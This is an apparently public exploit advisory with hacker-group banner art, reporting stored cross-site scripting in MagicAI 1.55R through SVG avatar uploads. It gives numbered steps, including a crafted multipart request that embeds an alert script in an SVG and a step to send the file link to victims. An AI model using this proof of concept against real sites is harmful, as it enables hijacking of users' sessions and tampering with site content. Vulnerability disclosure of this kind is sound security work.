MagicAI version 1.55R suffers from a persistent cross site scripting vulnerability via a file upload.
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ C r a C k E r ββ
ββ T H E C R A C K O F E T E R N A L M I G H T ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββ From The Ashes and Dust Rises An Unimaginable crack.... βββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ [ Vulnerability ] ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: Author : CraCkEr :
β Website : https://magicai.liquid-themes.com/ β
β Vendor : MagicAI β
β Software : MagicAI 1.55R β
β Vuln Type: Stored XSS via File Upload β
β Impact : Manipulate the content of the site β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: :
β Release Notes: β
β βββββββββββββ β
β β
β Allow Attacker to inject malicious code into website, give ability to steal sensitive β
β information, manipulate data, and launch additional attacks. β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09
CryptoJob (Twitter) twitter.com/0x0CryptoJob
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ Β© CraCkEr 2023 ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
## Steps to Reproduce:
1. Go to [Settings] on this Path (https://website/dashboard/user/settings)
2. Upload any Image in Avatar to capture the request in Burp Suite
3. Replace image.png with image.svg in [filename] and add this SVG with HTML Included
----------------------------------------------------------------------------------------
POST /dashboard/user/settings/save HTTP/2
Content-Disposition: form-data; name="avatar"; filename="image.svg"
Content-Type: image/png
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 96 105">
<html><head><title>test</title></head><body><script>alert('xss');</script></body></html>
</svg>
----------------------------------------------------------------------------------------
4. Send the Request
5. Back to the Path (https://website/dashboard/user/settings)
6. Refresh the Page
7. Capture the Link of your Uploaded svg in [Burp Logger] GET (https://website/upload/images/avatar/****-culote-mia-avatar.svg)
8. Send SVG Link to Victims
9. XSS Executed!
[-] Done